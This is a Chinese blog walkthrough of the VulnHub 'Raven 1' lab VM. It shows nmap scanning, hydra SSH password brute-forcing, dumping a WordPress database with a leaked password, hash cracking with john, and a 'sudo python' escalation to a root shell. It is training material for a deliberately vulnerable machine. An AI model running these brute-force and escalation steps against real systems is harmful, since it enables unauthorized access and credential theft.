VulnHub渗透测试之Raven

最新推荐文章于 2024-06-18 15:15:05 发布
最新推荐文章于 2024-06-18 15:15:05 发布
阅读量180 收藏
点赞数 1
分类专栏: 技术研究 渗透测试 文章标签: linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30817059/article/details/117440400
版权

知乎主页:https://www.zhihu.com/people/back-88-87
靶机地址:https://www.vulnhub.com/entry/raven-1,256/
博客:https://www.swback.cn/

靶机发布日期:2018年8月14日
目标:靶机上存在4个flag

下载下来之后,先使用VMware导入虚拟机
在这里插入图片描述

采用NAT的方式,不知道账号密码。

在这里插入图片描述
通过nmap扫描IP段

nmap 192.168.132.0/24

在这里插入图片描述在这里插入图片描述
访问站点,得到flag1
在这里插入图片描述

扫描目录
发现wordpress目录,进行访问

在这里插入图片描述
通过默认文章发现用户名为michael
在这里插入图片描述

hydra爆破,获得密码

hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.132.135

在这里插入图片描述

登录成功查看用户
发现steven用户以及root用户
在这里插入图片描述

网站目录获得flag1
在这里插入图片描述

获得flag2
在这里插入图片描述

在wordpress配置文件发现数据库账号密码
在这里插入图片描述

尝试ssh登录,失败
导出数据库

mysqldump -uroot -pR@v3nSecurity wordpress >1.sql

数据库中发现flag3 和flag4

在这里插入图片描述

获得4个flag之后,基本就结束了,但是还能继续挖一下

查看suid:

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

查看sudo 权限,。无权限
在这里插入图片描述

登录MySQL 获得网站的后台密码
在这里插入图片描述

拿到kali下使用john破解
指定rockyou的字典
在这里插入图片描述

耗时较长,先破解着、

想起来查看passwd的时候还有两个用户 steven 和root
使用 九头蛇爆破一下

hydra -l steven -P /usr/share/wordlists/rockyou.txt ssh://192.168.132.135
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.132.135

获得steven的密码为pink84

ssh登录
查看权限
在这里插入图片描述

发现python可以执行root权限
python提权
查看下python版本及目录
在这里插入图片描述

命令执行失败,忘记使用sudo。。

sudo python -c 'import os; os.system("/bin/sh")'

提权成功
在这里插入图片描述

两种都可以
在这里插入图片描述

查看shadow
在这里插入图片描述

后面查看源码可以发现网站目录下面除了一个备份文件还有.DS_Store源码泄露

而且可以看到flag4之前查看的应该是个意外
正常应该是在root目录下面才能查看到
++++++++++++++++++++++++++++++++++++++++++++++++++++++

SwBack
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机:Raven
prettyX的博客
04-05 618
靶机介绍 有4个flag,2种方法获取Root 靶机下载:https://download.vulnhub.com/raven/Raven.ova 开始 1、靶机IP发现,本次靶机的IP为192.168.1.101 arp-scan -l
recon-raven:渗透测试和漏洞赏金的侦察工具
04-27
渗透测试和漏洞赏金的侦察工具 如何安装? #> ./install.sh 用法 #> rraven 或者 #> ruby rranven.rb 支持功能和待办事项清单 子域发现(模糊) 子域接管漏洞 子域ping(连接检查) 端口扫描和子域端口扫描 ...
VulnHub-Raven
热门推荐
江左盟的博客
04-06 1万+
信息收集 使用nmap --min-rate 10000 -A 192.168.58.135 --script=vuln扫描目标主机,如图: 部分关键信息如下: Nmap scan report for 192.168.58.135 Host is up (0.00054s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8
Vulnhub——AI: WEB: 1
最新发布
流水不争先,争的是滔滔不绝
06-18 612
(1)OS-shell,Openssl的利用(2)Linux /etc/passwd文件写入root用户进行提权
vulnhub-raven
weixin_50683638的博客
12-29 2319
vulnhub-raven 靶机下载:https://download.vulnhub.com/raven/Raven.ova kali:nat模式,靶机也nat模式 探测主机 扫描端口 访问网站,查看源代码,看到service.html访问看到flag1 dirb http://192.168.11.128看到wordpress wpscan --url http://192.168.11.128/wordpress -e u hydra -l michael -P rockyou.txt 192
Vulnhub 靶机--Raven
Beret-81的博客
06-13 344
Vulnhub 靶机--Raven1、信息收集2、获取shell3、提权 1、信息收集 在这里发现了一个PHPmailer 存在命令执行漏洞 2、获取shell 在GitHub 找了一个exp,修改目标IP、目录、端口后,执行脚本 访问http://172.16.200.166/contact.php,此时就会生成后门文件shell.php kali开启监听,然后访问:http://172.16.200.166/shell.php 获取shell: 3、提权 在主机信息收集中获取mysql 账
Vulnhub系列:Raven 1
Ays.Ie的博客
03-07 538
该篇为Vulnhub系列靶机:Raven 1
Raven:Javascript框架
05-05
掠夺Raven是一个创造性的编码框架,在Javascript环境中结合了在openFrameworks,Processing和Flash中看到的意识形态。 类按类型分开,因此可以轻松选择项目中需要框架的哪些部分。 虽然仍处于青春期,但正在进行重大...
oscp推荐的训练靶机raven2渗透过程
07-05
Raven2 是 OSCP 认证考试中的一个训练靶机,旨在测试考生对渗透测试的理解和应用能力。本文将详细介绍 Raven2 渗透过程,包括信息侦察、漏洞利用、提权等阶段。 一、信息侦察阶段 信息侦察是渗透测试的首要阶段,...
Rraven:将R与Raven集成
04-28
拉文 Rraven软件包旨在促进R和()之间的数据交换。 提供了非常强大的工具来分析(动物)声音。 R可以简化复杂分析程序的自动化过程。 此外,R包(如 , 和 (以及其他))提供了其他分析方法,可作为发现的软件包...
Raven
10-25
"Raven"在此语境下可能是指一种特定的字体或字体库。Raven字体以其独特的风格和设计特点,被广泛应用于各种设计项目,如网页设计、图形设计、出版物以及品牌标识等。 Raven字体可能具有以下特性: 1. **设计风格**...
vulnhub吧唧——RAVEN: 1
xstlikeja的博客
07-14 148
我们利用MySQL的udf提权后修改find的权限为root,然后在find目录下启动一个新的shell,此时就具有root权限,在MySQL中仅仅是一个单向的shell,并不能进行交互,所以我们需要进一步提升shell,此时我们在find的shell下可以更改root的密码然后登录他的ssh,至此,这台吧唧我们已经拿到了最高的权限——root。我们发现Michael的密码并不能破解,但Steven的密码破解出来是pink84,我们现在拿到了一个账号和他对应的密码,但是他是哪儿的账号和密码呢。
靶场练习第二十四天~vulnhub靶场之Raven-1
qq_57976347的博客
02-22 1128
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.127 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 1.访问到http://
VulnHub-Raven-靶机渗透学习
嗯嗯呐的博客
11-11 774
靶机地址:https://www.vulnhub.com/entry/raven-2,269/ 靶机描述:Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in
vulnhub靶场,Raven2
kukudeshuo的博客
07-19 1545
vulnhub靶场,Raven2 环境准备 攻击机:kali(192.168.58.130) 靶机:Raven2(192.168.58.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80、111、56784 浏览器访问目标靶机80端口 就是一个非常普通的页面,没有啥好利用的 网站目录结构扫描 dirb http://19
Vulnhub靶机渗透:Raven1(超级详细)
Mysmycbx的博客
05-19 7703
发现有个contact.zip,下载下来解压,解压出contact.php,阅读源码。进入vendor文件夹,发现上面找到的phpmailer服务就存在这个文件夹里,翻找一下。在上面的内容中,我们获取到www-data权限,但通过扫描wordpress扫描到存在michael和steven两个用户,那能不能从这两个用户中,得到什么呢?下载下来一个试一试。找到了steven的用户凭据,但这里需要解密,使用john解密。,这里习惯性的使用ssh登录一下,结果成功了。扫描到后台,尝试弱密码登录,发现失败。
渗透测试VulnHub-Raven: 2
m0_52923241的博客
11-02 3158
VulnHub-Raven: 2VulnHub-Raven: 2渗透详细思路小知识点常用工具篇 VulnHub-Raven: 2渗透详细思路 VulnHub-Raven: 2渗透详细思路 nmap找目标ip地址,扫可以试用的开放端口和服务(22、80、111) dirb进行目录的爆破扫描 找漏洞,发现PHPMailer 邮件服务 searchsploit查看漏洞利用点,下载到本地,修改参数并运行 小知识点 常用工具篇 ...
vulnhub(De-ICE S1.100, S1.110)
公众号shadow sock7
01-16 1189
学了两个vulnhub上的box De-ICE S1.100 De-ICE S1.110 非常详细的writeup: http://blog.nullmode.com/blog/2013/10/31/de-ice-s1-dot-100-level-1-a-beginners-guide/
VulnHub——DC-3
菜鸟的学习笔记
12-30 174
DC-3 信息搜集 使用nmap进行探测和扫描 已知信息: CMS为Joomla 访问网页,没有多余的提示,表明仅有一个入口点。 搜索后得知访问/modules/mod_login/mod_login.xml文件可以查看版本,发现版本为3.1,并且发现了一个路径。 /administrator/components/com_menus/models/fields,/adminisrtator为后台登陆页面。 漏洞挖掘与利用 1、既然发现是Joomla,那么从github查找相应的工具进行攻击。 找到
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SwBack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值